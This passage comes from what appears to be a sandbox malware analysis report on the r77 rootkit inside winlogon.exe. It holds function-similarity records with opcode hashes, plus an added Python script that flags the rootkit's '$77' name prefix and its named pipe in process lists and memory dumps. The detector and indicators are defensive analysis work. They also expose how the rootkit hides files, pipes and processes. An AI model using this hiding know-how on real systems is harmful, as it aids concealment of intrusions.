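Two of the records above carry the only strings in this section that are not C runtime residue: the function that opens \\.\pipe\$77childproc with CreateFile/ReadFile/WriteFile, and the heap routine that handles the bare string $77. That prefix is the r77 rootkit's hiding convention: every file, directory, named pipe, process or registry entry whose name begins with $77 is hidden from processes the rootkit has hooked, which is the behaviour the report lists as "Hooks files or directories query functions". The Python below is an added example, not code from the report or from the rootkit. It flags $77-prefixed names in any list (live pipe enumeration on Windows, if available), and searches a dump or file for the marker in both 8-bit and UTF-16LE form, since a 64-bit native DLL normally stores such paths as wide strings. Function names and the sample byte blob are constructed for the example.

```python
import os
import sys
from typing import Iterable, List, Tuple

R77_PREFIX = "$77"                    # hiding prefix seen as a bare string in the record above
R77_PIPE_MARKER = "\\\\.\\pipe\\$77"  # start of the "\\.\pipe\$77childproc" pipe name


def flag_r77_names(names: Iterable[str], prefix: str = R77_PREFIX) -> List[str]:
    """Return the names that carry the r77 hiding prefix.

    Compared case-insensitively so a variant that changes the case of the prefix
    is still caught; the rootkit's own comparison rules are not relied on."""
    p = prefix.lower()
    return [n for n in names if n.lower().startswith(p)]


def live_pipe_names() -> List[str]:
    """Enumerate named pipes on a Windows host; returns [] elsewhere.

    Caveat: this walks the same directory-query path the rootkit hooks, so a
    hooked process will not see "$77" pipes. Run it from a process the rootkit
    has not been injected into, or compare against an offline memory image."""
    if sys.platform != "win32":
        return []
    return os.listdir("\\\\.\\pipe\\")


def find_r77_markers(blob: bytes) -> List[Tuple[int, str, str]]:
    """Locate r77 marker strings in raw bytes (memory dump, dropped file).

    Both the 8-bit and the UTF-16LE encoding are searched. Matches are returned
    as (offset, encoding, marker), sorted by offset."""
    markers = (R77_PIPE_MARKER, "\\" + R77_PREFIX)  # pipe path, and "\$77" path components
    hits: List[Tuple[int, str, str]] = []
    for marker in markers:
        for enc in ("ascii", "utf-16-le"):
            needle = marker.encode(enc)
            start = 0
            while (i := blob.find(needle, start)) != -1:
                hits.append((i, enc, marker))
                start = i + 1
    return sorted(hits)


# Constructed sample: padding around the pipe name stored as a wide string, standing
# in for a slice of the winlogon.exe dump the records above were taken from.
SAMPLE_BLOB = b"\x00" * 8 + "\\\\.\\pipe\\$77childproc".encode("utf-16-le") + b"\x00\x00"

if __name__ == "__main__":
    print(flag_r77_names(["lsass", "$77childproc", "chrome.1234"]))
    print(find_r77_markers(SAMPLE_BLOB))
    print(flag_r77_names(live_pipe_names()))  # empty off Windows, or in a hooked process
```

A hit from find_r77_markers in a dump of a process that shows nothing in live enumeration is itself the interesting result: it means the name exists in memory but the directory-query path is lying, which is exactly the hooking the report flags.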
                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: ErrorLast$Value$FreeHeap
• String ID:
• API String ID: 365477584-0
Similarity
• API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
• String ID:
• API String ID: 4193868204-0
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
Memory Dump Source
• Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: f8002cd5164244d4fdbc573aad52d47fef258c689792972c93fe9be7402ab2b7
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: C2519D362802C28AEB748F23D54836977A0F354B94F16412FEA9947BD6CB38D5D1CF21
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: cc70e37fd81b4bb2fc0d3d265740deaa4150f5d14d40f51702e48695acbe4227
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: AE61CF32508BC585EB208F16E44479ABBA0F785B88F05462AEB8903B9ACB7CC1D0CF10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: 9738be600728a272bc1629d2a6033316c47fab5129db49f355ed0aacbe005793
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 6911D6613547C351FB509B27E84835963A4F744780F82082AEE59C3AA6EF78C9D5CB30
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction ID: 979a5fc11aa4990d04fb00ba0fb59c403a9749a4564e295e3ad538058d39aab2
                                                                                                                                  • Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction Fuzzy Hash: 18D1FF32758B8589E750CFA6D4482DC37B1F354BD8F41421ACE4EA7B9ADA34C486CB51
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  • Opcode ID: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction ID: 49898b590e67b505099a33910b5f9d59a6108652a88092cd6afda640260e5630
                                                                                                                                  • Opcode Fuzzy Hash: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction Fuzzy Hash: 4A012972650BD1C6E708DF67E80C14977A1F789FC4B0A442ADE4A93729DF34D491CB50
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002E99176269F), ref: 000002E9917627D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: e7a960eedc558b4e1d89b4393649b64ad697125be812c4343ef3ab901cc01062
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: 1D91D2327506D285FB948B67D8587AD3BA0B354BC8F45410FDE4AA7B96CB38C4C5CB22
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction ID: 347410499891c68e914b47b101c2a2c2440ac89b599fb4da8834854f9c000fab
                                                                                                                                  • Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction Fuzzy Hash: A4115E22750F428AEF00CF61E8583A833A4F7197A8F450E2AEE6D867A5DF78C194C750
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: 51c3a5ebdc8659fd29fdfa7c113ec8a60fc1af55160e96b1737cba5982c5f491
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: E571B0362847C286E765DE27D8483E967A5F389784F56002BDE4A43B9ADF34C681CB60
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 42dbe6e92a8350891c591b0f780508e73b9a6fb98d72209de96eea736cbaa1f2
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: 357194323807C386E775AE67D8483AA67A5F3897C4F56001BDD0A53B9ADF34C6858B60
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: ce6399ee167b38c2359973d9212e56a99976a3dfd493039b186ea1d59cddc047
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 8851C9313566829AEB64CF17E448B6C33D1F354B88F16891AEE5643746D77AD8C3CB20
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                  • Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction ID: 0fe269d98857b2c3fda9527fd856ec23eac356f162e6d8906f79756ed98f1c81
                                                                                                                                  • Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction Fuzzy Hash: 0461A072505BC581EB608F16E4447AAB7A0F785B94F09461AEB8903B9ACB78C1D1CF10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: ce73aa44601743cf3e015d5f91180fe2e015fd1fbfde48ec3b6ef6d682136fa4
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: 3A41E832715AC186D760CF26E408799B7A4F3487C4F92412AEE4DC7759DB38C481CB61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: 3606808497edbf20d662895f74c6610c9cf0464f2ebfca14efeab02b7b6952ed
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: 24110D32214B8182EB618F16F448259B7E5F788B98F594229EF8D47BA5DF3CC591CB00
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: 21ca405e7cc76d6ae43869d68934ef90ffdfe88700d0c6fc1221b6959923ff06
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: E5118021A51BC1C2EA04DF6BE40C25967A0F789FD1F5A412ADE4E93726DF38D8C28B40
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 4365831ac4a1d78b19b4e20ed09ca75881cc88aced96f4e1924374582afe64e7
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: D8E065B1A51A81C7E7088FA7D80C34937E1FB88F89F4AC028C90947361DF7D84D99BA1
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: 4c5f173145cd02c75f98d18036ef2758b66d33a85de4f355505242d683ffbd8f
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: 97E0EDB1661581C7E7089B67D80C25977A1FB88B99F458029C90947311DE3884D99A21
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1667876134.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4aed0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X7)t
                                                                                                                                  • API String ID: 0-502735242
                                                                                                                                  • Opcode ID: b87ede6c9fc77477d2d56952c9e058ef0e961b1362249b2fc1da17cd1ede3e3c
                                                                                                                                  • Instruction ID: 14ba7426f3a1734105a9f6a8dc2aabf0435e3bbe77384b19cbc8af6f4068c5c8
                                                                                                                                  • Opcode Fuzzy Hash: b87ede6c9fc77477d2d56952c9e058ef0e961b1362249b2fc1da17cd1ede3e3c
                                                                                                                                  • Instruction Fuzzy Hash: 8BD123A295EA8A8FE7A6BF78C8155B97BD5FF16310B2800FED45CCB093DA189805C351
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000008.00000002.1666729479.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffb4ae00000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 301400cc170fefaaa3adda1eeb3efe0ba751c092febd3eaf905aa171128f7901
